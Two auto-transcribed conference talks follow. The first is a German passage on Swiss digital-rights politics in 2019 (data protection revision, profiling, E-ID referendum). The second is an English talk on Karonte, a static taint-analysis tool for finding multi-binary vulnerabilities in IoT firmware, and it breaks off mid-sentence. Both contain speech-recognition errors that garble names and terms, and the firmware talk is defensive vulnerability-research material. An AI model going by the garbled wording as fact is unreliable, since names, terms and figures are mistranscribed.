Gemeinde, die man gut auch rechts umfahren kann. Es geht um das Thema Datenschutzgesetz. Das aktuell gültige Datenschutzgesetz ist von 1992, ist schon etwas in die Jahre gekommen. Es hat bei der Einführung auch schon ein paar Jahre Debatte auf dem Buckel. Das Gesetz befindet sich gerade in der Totalrevision. Es wird zwischen den Parlamentskammern hin und her verhandelt. Das neue Gesetz soll kompatibel zur europäischen Datenschutzgrundverordnung der EU-DSGVO geschaffen werden, damit wir weiterhin zum europäischen Datenraum gehören, dass also personenbezogene Daten freigrenzüberschreitend übertragen werden können. Und eine Forderung von uns, das Schutzniveau darf im Vergleich zu heute nicht gesenkt werden, das droht an einigen Stellen leider. Das Gesetz ist also sehr wichtig, dass das Gesetz überarbeitet wird, dass es modernisiert wird. Der Parlamentarier aus Oberwiel-Lihrli, der sieht dies etwas anders. Für ihn ist das Gesetz ein Moloch, eine solche massive Anhäufung von unsinnigen Vorschriften hätte er noch nie gesehen und man hätte doch weiß Gott schon eine große Zahl unsinniger und unnötiger Gesetze. Es lässt sich sagen, dass für SP, Grüne und Grünliberale, dass der Entwurf des Gesetzes nicht weit genug geht. Für Bürgerliche ist er zu streng. Und sie vergessen aber dabei oft, dass die Kompatibilität zur EU-Datenschutzgrundverordnung auch für die Wirtschaft wichtig ist, dass wir das Schutzniveau also an die EU-DSGVO anheben müssen. Und die SVP, sie lehnt das Gesetz komplett ab, weil es da etwas von EU drin hat. Ein aktueller Streitpunkt ist Tracking und Profiling. Das ist eine der großen Debatten, die aktuell in den Räten läuft. Profiling ist, wenn automatisiert personenbezogene Daten ausgewertet werden, um daraus Persönlichkeitsmerkmale oder Verhaltensweisen abzuleiten oder vorherzusagen. Aktuell mit dem gültigen Datenschutzgesetz ist es so, dass wenn eine Einwilligung in ein Profiling erforderlich ist, dass diese nur gültig ist, wenn eine Einwilligung nach angemesserer Information freiwillig und ausdrücklich erfolgt ist. Nur so kann sichergestellt werden, dass eine solche Einwilligung nicht mit der pauschalen Zustimmung in allgemeine Geschäftsbedingungen oder gar eine Datenschutzerklärung eingeholt werden können. Sicherlich ein eindrückliches Beispiel für ein solches Profiling ist das Skandal um Cambridge Analytica, wo psychologische Profile von 87 Millionen Personen mithilfe einer Facebook App bestellt wurden und diese dann im US-Wahlkampf mit sogenannten Microtargeting eingesetzt oder verwendet worden sind. Aber auch in der Schweiz gibt es mehr und mehr Bestrebungen, so sind gerade die Schweizer Verlage daran, schrittweise eine Loginpflicht auf ihren Portalen einzurichten. Sie wollen damit das Geschäftsmodell von Google, Facebook und Co. kopieren und die Persönlichkeits-Eigenschaften ihrer Leserinnen und Leser zu Geld machen. Die Absicht dabei ist, personalisierte Werbung, aber auch personalisierte Inhalte auszuspielen. Um dieses Profiling geht es also aktuell in der Debatte und es sieht so aus, wie man sich auf einen risikobasierten Ansatz einigen könnte im Parlament. Das heißt, man würde das Parlament, das Profiling in ein Profiling mit hohem Risiko und ein Profiling mit mittleren oder tiefem Risiko unterscheiden und entsprechend eine solche Zustimmung erforderlich oder nicht. Als Kriterium für ein hohes Profiling ist aktuell vorgesehen, als Einkriterium, dass die Daten aus verschiedener Herkunft stammen würden. Das ist aber ein schlechtes Kriterium, weil wir eben gerade gesehen haben, zum Beispiel beim Skandal um Cambridge Analytica, dass auch eine Datenquelle durchaus ein hohes Risiko beinhalten kann. Das andere Kriterium ist, dass wenn es sich um einen systematischen und eine umfangreiche Bearbeitung handelt, welche verschiedene Lebensbereiche betreffen würde. Das ist aber so, dass gerade diese umfangreiche Bearbeitung eigentlich unklar ist, was wirklich damit gemeint ist. Und auch wenn man sich jetzt auf so einen risikobasierten Ansatz einigen würde im Parlament, würde im Unterschied zur EU-Datenschutzgrundverordnung ein Widerspruchsrecht fehlen. Wir fordern, dass das Gesetz als Ausgleich überall dort, wo keine Einwilligung zum Profiling vorgesehen ist, eine einfache Opt-Out-Möglichkeit für die betroffenen Personen geschaffen wird. Dass es also möglich ist, diesen Profiling auf einfache Art, indem ich einen Häkchen wegnehme, den widersprechen kann und ich den Dienst aber weiterhin nutzen kann. Und eine solche einfache Opt-Out-Möglichkeit würde auch dieser Webseite gut zu Gesicht stehen. Wir reisen weiter nach Luzern. Ja, und in Luzern geht es um den Datenreichtum. Mit Daten lässt sich eigentlich gut Geld verdienen. Mehr Daten führen außerdem zum sogenannten Datenreichtum. Das dachte sich dann auch dieser Herr aus dem Kanton Luzern. Er hatte Kiere 22 unaufgeforderte Mails geschickt und konnte dann nicht genau beantworten, beziehungsweise hat nicht geantwortet auf eine Datenauskunft. Und ja, dann hat Kiere den Strafantrag gestellt, wegen Verstoßes gegen das Webbewerbsgesetz. Das ist Spammingate und der unlautere Webbewerb. Und er wurde dann verurteilt zu einer Buße von 250 Franken, bloß Gerichtsgebühren 410 Franken. Das sind dann doch ein paar Tausend E-Mails, die man dann weniger verschicken kann, sollte man meinen. Aber kurioserweise ist ein paar Tage nachdem dieser Strafbefehl dann in Kraft getreten ist auf info-idb.brotherawards.ch von derselben XY-Group GmbH dann wieder Spammingate reingekommen. Und man kann sagen, der nächste Strafbefehl wird unterwegs sein. Das Daten, die man nicht hat, auch nicht gelegt werden können, hat Diswiskom erfahren. Diswiskom hat ihr Produkt MyCloud, das ist so ein Datenschweicher, Dropbox oder NextCloud für Arme. Natürlich mit Schweizer Präzision und Zuverlässigkeit angepriesen. Und das hieß in diesem Fall, dass 98% der Benutzer ihre Daten nicht verloren haben. Und bei denen 2%, bei denen die Daten verloren gingen, ging dann auch nur 5% dieser Daten verloren. Also, kein Problem, weil in den ARGB-Stand drin Datenverlust kann es geben. Sie bekam dann einen Gutschein. Ob sie die dann angelöst haben für dieses Projekt weiß ich nicht, vielleicht nicht. Umentschieden hat sich Diswiskom im nächsten Fall, wo sie dann Daten fleißig verteilt hatte. Und zwar haben dreieinhalb Tausend CS Mitarbeiter die Verbindungsdaten jeweils vom Kollegen bekommen. Was ja sicher kein Problem ist, weil Verbindungsdaten sind ja Randdaten, die kann man ja speichern und verteilen. Und ist ja nichts, nichts dran, wenn ich die Freundin meines Kollegen sonder rufe die ganze Zeit. Ja, das erinnert so ein bisschen am Fall von der Cobbank, die vor ein paar Jahren 10.000er Belege dann den Nachbarn zugestellt hat. Ich glaube, war auch irgendwie regional in gleichem Dorf oder so. Das hat sich ja zu netten Gesprächen geführt dann. Dann, die UBS hat Probleme mit USP Sticks. Das ist das erste, da haben ein paar Wochen jetzt rausgekommen. Eine Mitarbeiterin ist umgezogen nach Deutschland, ist aber bei der UBS geblieben. Und sie hatte dann noch so ein USP Stick dabei, das andere war schön gelöscht. Und auf diesem USP Stick befand sich nach Daten von Kunden aus Deutschland oder Frankreich. Es gab dann, glaube ich, 2014, ein paar Haushaltsuchsuchungen bei Schweizer Bankfilialen in Deutschland, Westdeutschland. Und dann kamen die Daten im Besitz von der Steuerverhandlung. Die gaben sie dann nach Frankreich weiter und ein Franzose hat das geklagt gegenüber der Bank, dass das Bankgeheimnis verletzt worden sei. Da ist da bis vor Bundesgericht gekommen, dort aber wieder abgeblitzt. Gründet sie noch nicht ganz klar, aber es heißt jetzt, er muss seine Steuern nachzahlen und auch noch die Gerichtsrechnung und sich noch einmal zu kosten. Der nächste Fall, ein bisschen kurioser, wer sich anonym im Netz bewegt, braucht Tor. Das ist hoffentlich allen klar. Was er nicht machen sollte, ist, sich in einem Appel Store irgendein PC einloggen oder das WLAN benutzen. Und weil da gibt es Videoüberwachung. Und die Polizei hat dann die IP-Adresse verfolgt, ist zu zwei Appel Stores gegangen, hat da Screenshots gemacht von der Videokamera. Und die sind dann ausgedruckt und zu den Achten gelegt, wenn man das halt so macht, in moderner Polizeiarbeit. Das Problem war jetzt, die Aufnahmen waren ein bisschen schlecht. Das ist kein Problem, wir haben CSI Zürich. Der umfalttechnische Dienst verfügt über 3D-Vermessung, 3D-Vertrafie, 3D-Leserscanner. Daran sind sie so um Fasskizzen zu machen. Mit diesen wurde der Erbetschuldigte dann vermessen. Sie haben in dieser Punkte an die Gelenke geklebt und die da wirklich biometrisch vermessen quasi. Den Laden vermessen mit den Kamerastandorten. Und am Schluss war das Resultat für die Untersuchungsbehörde, das rechtsgenügend erstellt sei, dass jetzt das die Person ist. Dann haben sie diesen 3D-Modellen. Also, wenn ihr Umfug im Internet treibt, bitte nicht in einem Apple Store. Und weiter geht es mit dem letzten Teil unserer Reise. Wir sind von Fluss angelangt mit Kire in Zürich. Danke. Ich möchte zum Schluss noch auf einige Veranstaltungen und Treffen hinweisen. Wir haben in diesem Jahr im Februar ein Winterkongress durchgeführt, den es auch im kommenden Jahr im Februar wieder geben wird. Wir werden dann in die Rote Fabrik in Zürich ziehen. Mit der 3. Ausgabe. Und zwar wird diese am Samstag 22. Februar im kommenden Jahr stattfinden. Das werden wieder um 28 Vorträge und Workshops angeboten werden. Das wird der Winterkongress soll aber vor allem auch dem Austausch dienen, dass Detailprogramme und Tickets sind, ab sofort verfügbar. Im April werden wir dann ein Datenreisenbüro in Zürich eröffnen. Wir ziehen zusammen mit weiteren Vereinen in eine Hackervereinswege. Da kommen dann auch der CCC Zürich, die Lux und die Schweizerische Gesellschaft für mechatronische Kunst zusammen an diesem Ort in der Nähe der Hartbrücke in Zürich. Dann wird es auch seit 2020 verschiedene Treffen geben. Speziell hervorgehoben sei hier das Netzpolitiktreffen am 9. Mai in Bremgarten. Das ist unser halbjährliches Treffen, wo die aktiveren Mitglieder und Organisationen der digitalen Gesellschaft sich einen Tag lang um die Themen besprechen, die im nächsten halben Jahr relevant sein werden. Am Kongress werden wir gleich im Anschluss an diesem Tag, also um 15.30 Uhr, uns im Lecture Room M2 treffen, wo wir uns auch etwas noch um die Themen vom kommenden Jahr austauschen werden und gemeinsam ins Gespräch kommen werden. Der Lecture Room M2, der ist durch die Glashalle hindurch und dann vor dem Adams-Saal nach rechts. Da werden wir dann gleich im Anschluss an den Tag gemeinsam hingehen. Wir würden uns freuen, möglichst viele von euch da zu sehen. Wir sind aber auch die ganzen vier Tage vom Kongress hier mit einem Informationsstand vertreten. Der ist gleich hier unter diesem Saal. Wir würden uns auch da über Besuch freuen. Nun denke ich, haben wir noch ein paar Minuten Zeit für Fragen und wir stehen zur Verfügung. Dann danke ich euch drei recht herzlich für diese Informationen und diesen schönen Vortrag. Ihr kennt es, wer eine Frage stellen möchte, 1, 2, 3 Mikrofonen im Saal und an der Nummer 1 steht bereits jemand. Ja, hallo zusammen. Vielen Dank für diese Zusammenfassung und auch für eure wertvolle Arbeit. Ich habe eine Frage zu EID. Wir wollen diesen Kampf gewinnen. Wir wissen, dass in der Schweiz die Wirtschaftslobby relativ mächtig ist, vor allem bei Abstimmungen, bei Initiativen und bei Referenten. Die haben vor allem ein sehr starkes Argument. Das heißt, erstens mal Roudinose, den wir vorgesehen haben, der sich wegen Google überzeugen ließ, nicht für das Leistungsschutzrecht zu stimmen, hat auch gesagt, dass ihr die GIGES und CTC und alle eigentlich Lobbyarbeit für Google macht, wenn ihr gegen dieses Gesetz seid. Wenn es quasi nicht möglich ist, dass die Schweiz, also quasi das Privatunternehmen sich zusammenschließen können und Identity-Providers sind, weil sonst würde diese Arbeit, würde diese Schnittstelle, diese Funktion von Google und Facebook und so weiter angeboten werden. Und das erzählt er an relativ vielen Podien. Das habe ich selbst auch schon erlebt. Das wird also eine der mächtigsten Argumente sein. Und ich glaube auch das zweite Argument ist, dass natürlich Sie behaupten werden, dass der Staat eine wesentliche Rolle spielt, vielleicht nicht bei der hoheitlichen Herausgabe der IID, sondern vor allem bei der Verifikation der Intentität, dass der Staat ganz stark involviert ist. Das sind so, glaube ich, die zwei Hauptargumente, wo ich mich frage, wie habt ihr deine Strategie, wie ihr da die Stimmbäfügelung überzeugen möchtet? Weil ich glaube, ja, das Hauptproblem wird auch sein, dass diese 87 Prozent, die gesagt haben, sie möchten eine staatliche IID, die zwar schon meinen, aber die müssen zuerst nochmal aktiviert werden. Also ich glaube auch ein weiteres Problem wird sein, dass hier ein, vielleicht nicht so, ja, dass die Indifferenz oder die Gleichgültigkeit der Wählerinnen und Wähler doch relativ groß ist bei dem Thema. Also bei dieser Frage bei der IID geht es zunächst mal darum, meines Erachtens, wozu diese IID verwendet werden soll. Und aus unserer Sicht ist es ganz klar, es geht um die Überführung der herkömmlichen Ausweisdokumente in die digitale Welt. Das heißt, wir sehen den Bedarf nach einer elektronischen Identifikation oder nach einer elektronischen Ausweisdokument überall da, wo man sich ausweisen muss. Also das heißt, wenn ich ein Handyabonnement abschließen möchte, wenn ich ein Bankkonto eröffnen möchte oder wenn ich E-Government machen möchte. Aber es geht nichts darum, dass wir ein generelles, allgemeines Login und schon gar nicht ein zentrales schaffen möchten mit einer E-ID. Und das ist ein unterschiedliches Ziel zu dem, was Swiss-Einmachen möchte oder was Google macht. Wir möchten mit einer E-ID keine Konkurrenz zu einem Google-Login oder zu einem Facebook-Login schaffen. Das können wir auch nicht mit einem schweizerischen Gesetz. Das ist der falsche Anlaufpunkt. Das können wir vielleicht mit internationalen Standards, könnte man das machen. Aber nicht mit einer Gesetzgebung in der Schweiz. Da würden sich auch Firmen außerhalb der Schweiz, würden sich nicht nach einem schweizerischen Gesetz richten. Oder die würden nicht eine schweizerische E-ID übernehmen, damit man sich auf ausländischen Diensten anmelden kann. Es geht hier tatsächlich darum, um diese Dienste, wo es auch wirklich eine Ausweispflicht besteht. Merci. Kurz die Frage an den Signal Angel. Haben wir Internetfragen? Nein aus dem Internet. Nein aus dem Internet. Es gab keine Fragen, aber es waren auch eine Personen mindestens aus der Schweiz zuhörend. Das ist doch schön zu hören, dass so viel auch zugeschaut wird. Sehr gut. Das Ziel publikum ist da. Mikrofon 1 steht noch jemand? Bitte. Danke vielmals für den Vortrag. Ich habe auch eine Frage zur E-ID. Dieser Abstimmungskampf wurde hier auch dargestellt als Währleis. Wir werden das gewinnen. Ich bin Unterrichtend an einer Schule und habe junge Studenten. Wenn ich so auf die Unterstützerliste schaue, dann gibt es da so ein paar Namen, die wirken eher abschreckend. Schweizer Seniorenrat, Verband für Seniorenfragen, Selbsthilfeorganisation für Senioren. Das ist nicht besonders sexy. Wie ist das Narrativ, damit wir die Jungen für dieses Anliegen gewinnen können? Was ratet ihr uns? Es gibt wahrscheinlich zwei Gruppen, die diese E-ID, so wie sie jetzt verabschiedet wurden, kritisch sehen. Das sind eine, die eine E-ID befürworten, aber sagen, dass die Ausrichtung so falsch ist. Das ist eher so die progressivere Seite. Und dann gibt es natürlich auch sehr viele Leute. Das würde ich jetzt eher die Seniorenverbände dazuzählen, die die ganze Digitalisierung eher kritisch sehen. Und da aus dieser Warte her eine eher ablehnende Position vertretern. Dann noch eine zweite Frage von Mikrofon 1. Im weit gibt es Anregungen da, das Konzept von Decentralized IDs mit dieser E-ID zu verknüpfen. Das heißt natürlich der Staat als Provider, als Zertifizierer der Identität, aber das Ganze in ein Decentralized ID-Kontext einzubinden. Decentralized, das ist auch was wir sehen würden. Was wir aber eher als Ansatz sehen würden, ist ein Ansatz, wie er auch in Deutschland gemacht wird, dass man diese glaubgeländischen Identifikationsmerkmale direkt auf die Ausweisdokumente anbringen würde. Zum Beispiel auf eine Smartcard. Und dann hätte man die Herausgabe einer EID gleichzeitig mit der Herausgabe von Herrn Herkelmücher aus Ausweisdokument gemacht. Also man müsste da keine eigene Infrastruktur machen, also keine neue zentrale Datenbank, wie es jetzt beim Fettpol vorgesehen ist, sondern man könnte das an diesen Stellen, wo jetzt die Identitätskarte hergestellt wird, könnte man auch diese Smartcard mit den, glaube ich, Identifikationsmerkmalen bestücken. Man könnte auch ein qualifiziertes Zertifikat gleich anbringen, wo man auch elektronische Unterschriften machen könnte damit. Das fehlt jetzt aktuell im vorgesehenen BGE, oder im verabschiedeten BGEID, fehlt diese Möglichkeit. Und man hätte dann eigentlich auch diese zentralen Infrastrukturen, Identity Provider, die bräuchte es mit einem solchen Ansatz nicht. Wir möchten diese eigentlich weder vom Staat noch von privaten Organisationen betrieben haben. Also eher in Richtung Islensche Irreliency. Ja. Gut, ich sehe soweit jetzt keine Wortmeldung mehr. Dann würde ich sagen, schließen wir den Vortrag. Vielen Dank, Kira, Ganti und Pat. Und...
Die Intensität des Kampfes um die Freiheit im digitalen Raum lässt auch in der Schweiz nicht nach. Wir blicken auf das netzpolitische Jahr 2019 zwischen Bodensee und Matterhorn zurück. Wir behandeln jene Themen, die relevant waren und relevant bleiben. Weiter zeigen wir, was von der Digitalen Gesellschaft in der Schweiz im neuen Jahr zu erwarten ist. Themen sind unter anderem: Elektronische Identifizierung (E-ID): Das Gesetz, welches die elektronische Identifizierung regelt, ist verabschiedet worden. Der digitale Ausweis soll von privaten Unternehmen herausgegeben werden. Wir haben das Referendum gegen das Gesetz ergriffen. E-Voting: Ein öffentlicher Test des letzten sich im Rennen befindenden Systems war vernichtend. Wie es nun weitergeht im Kampf für das Vertrauen in die direkte Demokratie in der Schweiz. Netzsperren: Das erste Gesetz, in dem Netzsperren explizit verankert sind, ist dieses Jahr in Kraft getreten. Wie es in der Umsetzung aussieht Leistungsschutzrecht: Was es ins neue Urheberrechtsgesetz geschafft hat - und wie das Leistungsschutzrecht bezwungen wurde. Datenschutz: Wo in der Schweiz besonders viel «Datenreichtum» zu beobachten war und was es mit der Login- bzw. Tracking-Allianz auf sich hat. Netzneutralität: Nach einem langen Kampf erhält die Schweiz eine gesetzlich verankerte Netzneutralität. Im kommenden Jahr wird das Gesetz in Kraft treten. Digitale Gesellschaft in der Schweiz: Winterkongress, Big Brother Awards und andere Aktivitäten. Nach dem Vortrag sind alle interessierten Personen eingeladen, die Diskussion in einem Treffen fortzusetzen. Es werden Aktivistinnen und Aktivisten von verschiedenen Organisationen der Netzpolitik in der Schweiz anwesend sein (Digitale Gesellschaft, CCC-CH, CCCZH, Piratenpartei Schweiz).
10.5446/53139 (DOI)
So, our next speaker for today is a computer science PhD student at UC Santa Barbara. He is a member of the Shellfish hacking team and he's also the organizer of the IECTF hacking competition. Please give a big round of applause to Nilo Radini. Thanks for the introduction. Hello to everyone. My name is Nilo and today I'm going to present you my work, the research suggests that we will reach the 20 billion units by the end of the next year. A recent study conducted this year in 2019 on 16 million households showed that more than 70% of homes in North America already have an IoT network connected device. IoT devices make everyday's life smarter. You can literally say it will act as some cold and Alexa will interact with the thermostat and increase the temperature of your room. Usually the way we interact with the devices is through our smartphone. We send a request to the network to some device router or door lock. Or we might send the same request through a cloud endpoint, which is usually managed by the vendor of the device. The other way is through the IoT hubs. Smartphone will send a request to some IoT hub, which in turn will send a request to some other devices. As you can imagine, IoT devices use and collect our data and some data is more sensitive than other. For instance, think about the data that is collected by SmartLiveBall, again the data that is collected by our security camera. Such IoT devices can compromise people's safety and privacy. Things, for example, about the security implication of a faulty smart lock or the breaks of your smart card. So the question that we asked is, are IoT devices secure? Well, like everything else, this slide is a bit bad, are not. In 2016, the mirab botnet compromised and leveraged millions of devices to disrupt core internet services such as Twitter, GitHub and Netflix. In 2018, 154 vulnerabilities affecting IoT devices were published, which represented an increment of 15% compared to 2017 and an increase of 115% compared to 2016. So then we wonder, so why is it hard to secure IoT devices? To answer this question, we have to look at how IoT devices work and are made. Usually, when you remove all the plastic and peripherals, IoT devices look like this, a board with some chips laying on it. Usually, you can find the main chip, the microcontroller, which runs the firmware, and one or more peripheral controllers which interact with external peripherals such as the most of your smart lock or cameras. So though the design is generic, implementations are very diverse. For instance, firmware may run on several different architectures such as ARM, MIPS, X86, PowerPC and so forth. And sometimes, they're even proprietary, which means that if a security analyst wants to understand what's going on in the firmware, we'll have hard time if he doesn't have the vendor specifics. Also, the operating environment will limit the resources, which means that they run small and optimized code. For instance, vendors might implement their own version of some known algorithm in an optimized way. Also, IoT devices manage external peripherals that often use custom code. Again, with peripherals, we mean like cameras, sensors and so forth. The firmware of IoT devices can be either Linux-based or a Blob-firmware. Linux-based are by far the most common. A study showed that 86% of firmware are based on Linux. On the other hand, Blob-firmware are usually operating systems and user applications packaged in a single binary. In any case, firmware samples are usually made of multiple components. For instance, let's say that you have your smartphone and you send a request to your IoT device. This request will be received by a binary, which we term as border binary, which in this example is a web server. The request will be received, parsed, and then it might be sent to another binary called the handle binary, which will take the request, work on it, produce an answer, send it back to the web server, which in turn will produce a response to send to the smartphone. So, to come back to the question, why is it hard to secure IoT devices? Well, the answer is because IoT devices are in practice very diverse. Of course, there have been various work that have been proposed to analyze and secure firmware for IoT devices. Some of them use ecstatic analysis, others using dynamic analysis, and several others using a combination of both. Here I wrote several of them. At the end of the presentation, there is a bibliography with the title of these works. Of course, all these approaches have some problems. For instance, the dynamic analysis are hard to apply to scale because of the customized environments that IoT devices work on. Usually, when you try to dynamically execute a firmware, it's going to check if the peripherals are connected and they're working properly. In the case where you don't have the peripherals, it's going to be hard to actually run the firmware. Also, ecstatic analysis approaches are based on what we call the single-banner approach, which means that binaries from a firmware are taken individually and analyzed. This approach might produce many false positives. For instance, let's say again that we have our two binaries. This is actually an example that we found on one firmware. The web server will take the user request, will parse the request and produce some data, will set this data to an environment variable, and eventually will execute the end-of-banner. Now, if you see, the parsing function contains a sync compare, we check if some keyword is present in the request, and if so, it just returns the whole request. Otherwise, it will constrain the size of the request to 128 bytes and return it. The end-of-banner in turn, when spawned, will receive the data by doing a get-amp on the query string, but also will do a get-amp on another environment variable, which in this case is not user-controlled, and the user cannot influence the content of this variable. Then, it's going to call a function, process request. This function eventually will two string copies, one from the user data and the other one from the log path, on two different local variables that are 128 bytes long. Now, in the first case, as we have seen before, the data can be greater than 120 bytes, and this string copy might result in a bug. While in the second case, it will not, because here we assume that the system handles its own data in a good manner. So, throughout this work, we're going to call the first type of binary, the set-up binary, which means that it's the binary that takes the data and set the data for another binary to be consumed. And the second type of binary is we'll call them the get-up binary. So, the cutting back finding tools are not a great because other bugs are left undiscovered if the analysis only considered those binaries that received network requests, or they're likely to produce many false positives if the analysis considered all of them individually. So then, we wonder how these different components actually communicate. They communicate through what they're called inter-process communication, which basically it's a finite set of paradigms used by binaries to communicate, such as files, environment variables, MMIO, and so forth. All these APCs are represented by data keys, which are file names, or in the case, on the example before here on the right, it's the query string environment variable. Each binary that relies on some shared data must know the endpoint where such data will be available, for instance, again, like a file name or like even a socket endpoint or the environment variable. This means that usually, data keys are coded in the program itself, as we saw before. Therefore, to find bugs in firmware in a precise manner, we need to track how user data is introduced and propagated across the different binaries. Okay, let's talk about our work. Before we start talking about Caronte, we define our threat model. We hypothesize that attacker sends arbitrary requests over the network, both LAN and one, directly through the IT device. Though we said before that sometimes, IT device can communicate through the cloud, research showed that some form of local communication is usually available, for instance, during the setup phase of the device. Caronte is defined as a static analysis tool that tracks data flow across multiple binaries to find vulnerabilities. Let's see how it works. So the first step, Caronte, find those binaries that introduce the user input into the firmware. We call these border binaries, which are the binaries that basically interface the device to the outside world, which in the example is our web server. Then it tracks how data is shared with other binaries within the firmware sample, which we will understand in this example that web server communicates with the end-all binary, and it bears what we call the BDG. A BDG, which stands for binary dependency graph, it's basically a graph representation of the data dependencies among different binaries. Then we detect vulnerabilities that arise from the misuse of the data using the BDG. This is another view of our system. We start by taking a packed firmware, we unpack it, we find the border binaries, then we build the binary dependency graph, which relies on a set of CPFs, as we will see soon. CPF stands for communication paradigm finder. Then we find the specifics of the communication, for instance, like the constraints applied to the data that is shared through our module multibinary data flow analysis. Eventually, we run our insecure interaction detection module, which basically takes all this information and produces alerts. Our system is completely static and relies on our static taint engine. Let's see each one of these steps more in details. The unpacking procedure is pretty easy. We use the off-the-shelf firmware unpacking tool bin walk. Then we have to find the border binaries. We see that border binaries basically are binaries that receive data from the network, and we hypothesize that we contain parsers to validate the data that they received. In order to find them, we have to find parsers, which accept data from the network and parse this data. To find parsers, we rely on the related work, which basically use a few metrics and define through a number the likelihood for a function to contain parsing capabilities. These metrics that we used are number of busy blocks, number of memory comparisons operations, and number of branches. While these define parsers, we also have to find if a binary takes data from the network. As such, we define two more metrics. The first one, we check if binary contains any network-related keywords as SOAP, HTTP, and so forth. Then we check if there exists a data flow between read from socket and a memory comparison operation. Once for each function, we got all these metrics, we compute what is called a parsing score, which basically is just a sum of products. Once we got a parsing score for each function in a binary, we represent the binary with its highest parsing score. Once we got that for each binary in the firmware, we clustered them using the DB scan density-based algorithm and considered the cluster with the highest parsing score as containing the set of border binaries. After this, we build the binary dependency graph. Again, the binary dependency graph represents the data dependency among the binaries in a firmware sample. For instance, this simple graph will tell us that binary A communicates with binary C using files, and the same binary A communicates with binary B using environment variables. Let's see how this works. We start from the identified border binaries, and then we taint the data compared against network-related keywords that we found, and run static analysis to detect whether the binary relies on any IPC paradigm to share the data. If we find that it does, we establish if the binary is a setter or a getter, which again means that if the binary is setting the data to be consumed by another binary, or if the binary actually gets the data and consumes it. Then we retrieve the employed data key, which, in the example before, was the keyword query string. Finally, we scan the firmware sample to find other binaries that might rely on the same data keys as scheduled for further analysis. To understand whether a binary relies on any IPC, we use what we call CPFs, which again means a communication paradigm finder. We design ACPFs for each IPC, and the CPFs are also used to find the same data keys within the firmware sample. We also provide Caron to the generic CPF to cover those cases where the IPC is unknown, or those cases where the vendor implemented its own version of some IPC. Say, for example, they don't use the set-amp, but they're implemented their own set-amp. The idea behind this generic CPF that we call the Sematic CPF is that data keys have to be used as index to set or to get some data in this simple example. Let's see how the VDG algorithm works. We start from the binary, which again starts from the server request and will parse the URI. We see that here it runs a string comparison against some network-related keyword. As such, we change the variable P, and we see that the variable P is returned from the function to these two different points. As such, we continue, and now we see that data gets tainted, and the variable data is passed to the function's attempt. At this point, the environment CPF will understand that tainted data is passed, is set to an environment variable, and will understand that this binary is indeed the set-amp that uses the environment. Then we retrieve the data key query string, and we search within the Fumer sample all the other binaries that rely on the same data key. We will find that this binary relies on the same data key, and we schedule this for further analysis. After this algorithm, we build the VDG by creating edges between setters and getters for each data key. The multibinary data flow analysis uses the VDG to find and propagate the data constraints from a setter to a getter. Now, through this, we apply only the least-street constraints, which means that ideally between two program points, there might be an infinite number of parts, and ideally, in theory, an infinite amount of constraints that we can propagate to the setter binary to the getter binary. But since our goal here is to find bugs, we only propagate the least-street set of constraints. Let's see an example. Again, we have our two binaries, and we see that the variable that is passed to the set-amp function is data, which comes from two different parts from the parse-url function. In the first case, the data that is passed is unconstrained. One in the second case, a line eight, is constrained to be n most 120 bytes. As such, we only propagate the constraints of the first BI. In turn, the getter binary will retrieve this variable from the environment and set the variable query, which in this case will be unconstrained. Then, secure interaction detection, run a study-print analysis, and check whether the data can reach a sync in an unsafe way. We consider a sync's memcopy-like functions, which are functions that implement semantically equivalent memcopsies, string copy, memcopsies, and so forth. We raise alerts if we see that there is a deference of a tinted variable, and if we see there are comparisons of tinted variables in loop conditions to detect possible dose vulnerabilities. Let's see an example again. We know that our query variable is tinted and it's unconstrained. Then we follow the tints in the function process request, which we see will eventually copy the data from Q to ARC. We see that ARC is 128 bytes long while Q is unconstrained, and therefore we generate alerts here. Our static tint engine is based on bootstool and it's completely based on symbolic execution, which means that the taint is propagated following the program data flow. Let's see an example. Assuming that we have this code, the first instruction takes the result from some seed function that might return for instance some user inputs. In the symbolic world, what we do is that we create a symbolic variable, ty, and assign to it a tinted variable that we call taint2y, which is the taint tag ad. The next instruction, x, takes the value ty plus five. In the symbolic world, we just follow the data flow and x gets assigned taint2y plus five, which effectively tints also x. If at some point x is overwritten with some constant data, the taint is automatically removed. In its original design, bootstool, the taint is removed also when the test is constrained. For instance, here we can see that the variable LAN is tainted, but then it's constrained between two values, zero and 255, and therefore the taint is removed. In our taint engine, we have two additions. We added a path prioritization strategy and we add the independences. The path prioritization strategy valorizes paths that propagate the taint and deprioritize those that remove it. For instance, say again that we have our, that some user input comes from some function and the variable user input gets tainted. Then it gets tainted and then it's passed to another function called paths. Here, if you see, there are possibly an infinite number of symbolic paths in this while, but only one will return tainted data while the others won't. So the path prioritization strategy valorized this path instead of the others. This has been implemented by finding basic blocks within a function that return non-costal data, and if one is found, we follow its return before considering the others. Taint dependencies allow smart and taint strategies. Let's see again the example. So we know that user input here is tainted, is then parsed, and then we see that its length is checked, stored in a variable n. Its size is checked and if it's higher than 512 bytes, the function returns, otherwise it copies the data. Now, in this case, it might happen that if this string-lan function is not analyzed because of some static analysis and precision, the taint tag of command might be different from the taint tag of n. In this case, though n gets untainted, common is not untainted, and this string copy can raise... sorry, can raise false positive. So to fix this problem, basically, we create a dependency between the taint tag of n and the taint tag of cmd. And when n gets untainted, common gets untainted as well, so we don't have more false positives. This procedure is aromatic and we find functions that implement string-length semantically equivalent code and create taint tag dependencies. Okay, let's see our evaluation. We run three different evaluations or two different data sets. The first one composed by 53 latest firmware samples from 7 vendors and the second one on 899 firmware gathered from the related work. In the first case, we can see that the total number of binaries considered are 8.5k, if you're more than that. And our system generated 87 alerts of which 51 were found to be true positive and 34 of them were multibinary vulnerabilities, which means that the vulnerability was found by tracking the data flow from the set to the gathered binary. We also run a comparative evaluation which basically we tried to measure the effort that an analyst would go through in analyzing firmware using different strategies. In the first one, we consider each and every binary in the firmware sample independently and run the analysis for up to seven days for each firmware. The system generated almost 21,000 alerts considering only almost 2.5k binaries. In the second case, we found the worded binaries, the parsers, and we statistically analyzed only them. And the system generated 9.3k alerts. In this case, since we don't know how the user input is introduced in this experiment, we consider every IPC that we find in the binary as a possible source of user input. And this is true for all of them. In the third case, we run the BDG, but we consider each binary independently, which means that we don't propagate constraints, and we run a static single binary analysis on each one of them. And the system generated almost 13,000 alerts. Finally, we run Caronte, and the generator alerts were only 74. We also run a large-scale analysis on 899 firmware samples, and we found that almost 40% of them were multibinary, which means that the network functionalities were carried on by more than one binary. And the system generated 1,000 alerts. Now, there is a lot going on in this table, like details around the paper here in this presentation. I just go through some of it. So we found that, on average, a firmware contains four-border binaries, a BDG contains five binaries, and some BDG have more than 10 